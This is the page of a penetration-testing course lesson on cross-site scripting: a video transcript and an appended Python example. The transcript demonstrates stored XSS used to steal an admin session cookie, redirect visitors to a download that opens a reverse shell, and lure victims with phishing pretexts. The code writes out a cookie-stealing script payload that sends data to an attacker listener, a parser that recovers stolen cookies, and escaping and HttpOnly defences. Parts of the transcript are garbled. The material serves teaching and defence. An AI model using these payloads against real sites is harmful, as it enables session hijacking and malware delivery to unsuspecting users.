Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody. Welcome to episode number 18 of the course:
00:05
cross-site scripting.
00:07
My name is Alejandro Guinea, and I'll be your instructor for today's session.
00:11
The learning objective is to understand the concepts behind this attack, the cross-site scripting attack, and to apply techniques to implement a cross-site scripting attack as well.
00:22
So let's get down to business, shall we?
00:26
First let me start by giving you some background on the cross-site scripting attack. Cross-site scripting, or XSS, attacks are a type of injection in which malicious scripts are injected into
00:44
otherwise trusted websites, if you like.
00:47
Cross-site scripting attacks occur when an attacker uses a web application input, like a search box or a comments section,
00:58
to send or insert malicious code.
01:02
You can imagine that the script or code will be executed by anybody trying to access that web page. The flaws that allow these attacks to succeed are quite easy to find because
01:21
there's a lot of this vulnerability on several web pages around the world, unfortunately.
01:27
In this case, the end user's browser has no way to know that the script should not be trusted, because the script will be executed in a context where the web page is trusted. For example, you already performed the TLS handshake
01:47
against the server. You already know that that's the server you're actually
01:53
trying to access. Maybe an e-commerce server; you're just trying to buy a T-shirt or something like that. Your browser already trusts that server. There's no way to know that
02:08
the malicious script or malicious code should not be trusted. So the script will be executed.
02:17
Now, there are three types of cross-site scripting attacks. The first one, I guess the most famous one, is stored cross-site scripting.
02:31
Stored cross-site scripting
02:34
generally occurs when user input
02:38
is stored on the target server. You put a malicious script
02:46
in a comments section, so this could be saved in a database or in the web page itself,
02:53
and you then
02:58
can retrieve information from any victim actually trying to access that web page, for example a cookie or credentials. You can actually redirect them to another web page, or perform any kind of malicious stuff.
03:14
The second type of cross-site scripting attack is the reflected cross-site scripting,
03:19
or you can also find it as the non-persistent cross-site scripting attack.
03:24
This attack happens when the user input,
03:30
whatever the user inputs, is returned by the web page as an error message, search results, or something like that.
03:40
This is not so common to use; it's another type. And the third and final one is the DOM-based
03:52
cross-site scripting attack. You can also find it as the type-0 attack.
03:58
This is a form of cross-site scripting where the entire data flow from source to sink takes place in the browser.
04:05
For example, the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. So this is kind of what happens
04:21
in these three different types of cross-site scripting attacks. So let's see a practical example of the cross-site scripting attack; in this case, a stored-based cross-site scripting attack.
04:34
So, you remember we already have our web page, but let me just show you here. We already have a Debian server running,
04:46
so just open the browser and type the IP of the Debian.
04:53
It has a really simple page: it has a comments section, it has two comments sections, it has an admin login, for which we don't have the password, by the way. So yeah, as I told you before, you can,
05:11
as we're going to see, perform a stored cross-site scripting attack.
05:14
You can actually try inputting some basic comments, for example, just to see if this is actually vulnerable. Let me just type here "test". And, for example, we can just start a script here, <script>,
05:30
alert, and just launch an alert, for example, "cross site scripting",
05:38
and just close the script.
05:42
As simple as that. And as you can see, every time someone actually tries to access this, the alert will launch.
05:56
The problem is that this is not that malicious at all. But you can imagine you can do a lot more stuff. This is the browser I have in my Kali machine. But I have an XP machine running right here. And if I go to the
06:15
home, I see this one comment on the welcome page. So if I go here, you can see the message launched saying "cross site scripting", as we instructed. This is kind of trying to be like the victim of this attack,
06:30
because here's the attacking machine, which is the server,
06:34
but
06:36
we already have the victim machine
06:40
right here.
06:42
But what happens if I wanted to do something more malicious, like stealing a cookie? I already have a script running on the Debian server side,
06:55
which
06:56
tries to be like
06:59
some administration, an administrator, I'm sorry,
07:02
logging into the web page, so we can try to mimic someone trying to access the web page with valid credentials. So that's the assumption here, just so you know. So
07:16
we already have our script here, but we can insert another comment, just to
07:24
and,
07:26
let me just copy-paste that script, and I will explain it to you.
07:31
So this really simple script will write a document, and in this case the document will be the cookie, and it will send it to my listening server. I will open a port, and I will open a listener on port 8585,
07:49
and that's it, not that complicated at all. Again, the assumption is that in the Debian server, where this web page is located, I have a simple script running which is trying to mimic an administrator logging into the web page. So we will have a valid cookie
08:07
that was created due to a valid login
08:11
at the server side,
08:13
and I inserted it. And as you can see, there's another comment in here. So now I have to just open a listener so we can actually get the cookie back to us. I can use netcat or ncat, but it will die after we receive the first cookie. Maybe
08:31
we're waiting for a specific
08:33
cookie created from a specific IP or machine. So for these kinds of applications, I like to use the Python module which is called http.server. So we'll just type here python3
08:50
-m
08:50
http.server. And as you remember, we put 8585, so we'll be listening for cookies
08:58
on this port. So we'll wait for a while. But meanwhile,
09:07
as you can imagine, we can also actually perform other malicious stuff,
09:13
like, for example, redirecting the user to a different web page, or using any type of malicious stuff. But I'll show that to you later in this video. So for now, we just copy the cookie, and remember, we don't have access to admin,
09:31
but we can change that. So I just go to a cookie manager plugin. I use this one, but you can use whatever you feel comfortable with, and just replace the cookie with the values,
09:43
save, close, or whatever. If I go to admin, I don't need the password anymore. I already have a valid cookie which was created from a valid login. So you can see how dangerous this could be.
10:01
The other thing that we can actually do, let me just go to home here, is to actually redirect that. Let me log out. If I go to admin, the cookie is no longer valid.
10:13
You know, we expect that the other thing we can do is do actually ing meanwhile, are serious evict cookies.
10:20
Uh, the other thing that we can do is to redirect again
10:24
the user thio down, look or debate them to download and specific file. I want,
10:33
uh, let me just copy paid the script here. Now we'll split it to you.
10:43
Uh, in this case, I'm just created a document, you know, put in a link and then going thio whenever this document gets loaded or, you know, someone actually enters to that weapon, you will redirect to that
10:58
document That, except this documented except contains about dirt. I mean, a river Shal how to create that is Ah, we'll see that later in other medias.
11:11
But, you know, we already created that. And there's your server. You go here,
11:18
you just copy. Paste out me here.
11:20
If you actually go here, you will see that the document will be download is already created. And I put it into my web ***
11:28
and just download link, you know, and that's it.
11:31
So
11:33
anyone actually trying to go here, you know, it will be redirected to that weapons. So I'm just using my windows victim here. And if I go to welcome. Okay, Chris, I scripted. And it will, as you can see, the doctor me with glee that that X ray will be downloaded.
11:52
So we can actually,
11:54
now you can imagine, for the victims, I mean, I used an executable file, but you can imagine doing the same with a PDF file, a Word or Excel file, whatever. And if the victim is actually expecting something like that, like, you can
12:16
pretend to be their CEO or something like that, telling them to open the PDF because
12:22
there's information about the last quarter's sales numbers or something like that. The victims will often open it without any doubt. In this case, I just used an executable file just to show you guys. But you can put that in a more
12:39
usual format for you.
12:43
So just let me stop, go here, and start a listener, a simple netcat listener,
12:52
on 4444, if I remember correctly. And if I go to the victim here and I just execute this, OK, run, whatever.
13:03
You can see that we actually already have a reverse shell, and all the victim was doing was surfing the web page. Remember, there's nothing suspicious about it. I mean, the web server was the same; the web server, the IP or the hostname, didn't change at all.
13:22
And I already have a backdoor, a reverse shell,
13:26
if you want.
13:28
So,
13:30
just to show you,
13:33
I can already run ipconfig, and
13:37
what can I tell you? Netstat,
13:41
yes, to show.
13:46
Oh, it wasn't that.
13:48
And to show you how dangerous this could be.
13:52
Just give me
13:56
Is this a client-based or a server-based attack? Well, even though we actually target the server, because we're inserting the script on the server, the affected ones are the clients. This could be true for stored-based. Remember, there are three types of attack:
14:16
stored-based, reflected-based, and DOM-based attacks.
14:20
We can also target the client directly. The most common one is the one that targets the server, and the clients are the affected ones.
14:31
Can we actually gain remote control through this attack? Yeah, we can. I mean, I just showed you that you can, through maybe social engineering, or just by inserting that in the web page, make the victims who already trust that web server
14:50
download and open any file
14:54
you attach to it.
14:56
In summary, we learned the concepts of this attack, we implemented the techniques to perform this attack, and we saw how malicious this attack can be.
15:09
You can check The Hacker Playbook 3; actually, you can use that book as a reference for this complete module. These attacks are mentioned in that book, and I think it's a really great book overall.
15:24
And as you can also see, all of these attacks of this module have every possible source on Google and YouTube; it will be useful for you.
15:33
Looking forward, in the next video we'll cover SQL injection,
15:39
so
15:41
that's it for today, folks. I hope you enjoyed the video, and talk to you soon.
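The stored cookie-theft attack walked through in the lesson, as an added Python example that is not part of the original video or its lab. It shows the kind of cookie-stealing comment the instructor pastes in, injected verbatim by a vulnerable page renderer and neutralized by an HTML-escaping one; it parses the access-log lines that the `python3 -m http.server` listener prints to recover the exfiltrated cookie; and it checks whether a session cookie is even readable by script. The listener address, the cookie name and value, and the log lines are constructed for this example and are assumptions, not values from the video.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Constructed values for this example (not from the video): the attacker's listener,
# started with "python3 -m http.server 8585" as in the lesson, and a fake admin cookie.
ATTACKER_LISTENER = "http://10.0.0.5:8585/"
ADMIN_SET_COOKIE = "PHPSESSID=abc123; Path=/"

# Cookie-stealing comment in the spirit of the one pasted in the video: when a victim's
# browser renders the page, the image request carries document.cookie to the listener.
COOKIE_STEALER_COMMENT = (
    "<script>new Image().src='" + ATTACKER_LISTENER
    + "?c='+encodeURIComponent(document.cookie);</script>"
)


def render_comment_vulnerable(comment: str) -> str:
    """Stored-XSS-prone rendering: user input is concatenated into the page verbatim."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_escaped(comment: str) -> str:
    """Hardened rendering: HTML-escape the stored comment before inserting it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(page_html: str) -> bool:
    """Crude marker of whether an injected <script> survived rendering (demo only)."""
    return _SCRIPT_TAG.search(page_html) is not None


# http.server prints one access-log line per request, in this shape:
#   10.0.0.9 - - [12/Mar/2020 10:33:21] "GET /?c=PHPSESSID%3Dabc123 HTTP/1.1" 404 -
_LOG_LINE = re.compile(r'^(?P<ip>\S+) - - \[[^\]]+\] "GET (?P<path>\S+) HTTP/1\.[01]" ')


def cookies_from_listener_log(lines):
    """Recover (victim_ip, cookie_string) pairs from http.server access-log lines."""
    found = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group("path")).query)
        for value in query.get("c", []):
            found.append((m.group("ip"), value))
    return found


def cookie_readable_by_script(set_cookie_header: str) -> bool:
    """True if the Set-Cookie header lacks HttpOnly, so document.cookie exposes it."""
    attributes = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


# Constructed listener output: the admin's browser hit the stealer, plus unrelated noise.
SAMPLE_LISTENER_LOG = [
    '10.0.0.9 - - [12/Mar/2020 10:33:21] "GET /?c=PHPSESSID%3Dabc123 HTTP/1.1" 404 -',
    '10.0.0.9 - - [12/Mar/2020 10:33:21] "GET /favicon.ico HTTP/1.1" 404 -',
    "Serving HTTP on 0.0.0.0 port 8585 (http://0.0.0.0:8585/) ...",
]


if __name__ == "__main__":
    print(render_comment_vulnerable(COOKIE_STEALER_COMMENT))
    print(render_comment_escaped(COOKIE_STEALER_COMMENT))
    print(cookies_from_listener_log(SAMPLE_LISTENER_LOG))
    print("admin cookie readable by script:", cookie_readable_by_script(ADMIN_SET_COOKIE))
```

Marking the session cookie `HttpOnly` blocks this particular exfiltration, because `document.cookie` no longer returns it, but it does not remove the XSS itself; the escaping in `render_comment_escaped` is the actual fix, and it has to be applied wherever untrusted data is inserted into HTML. The same stored script could still redirect the victim to the download link shown later in the video.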

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Alejandro Guinea
CERT Regional Director
Instructor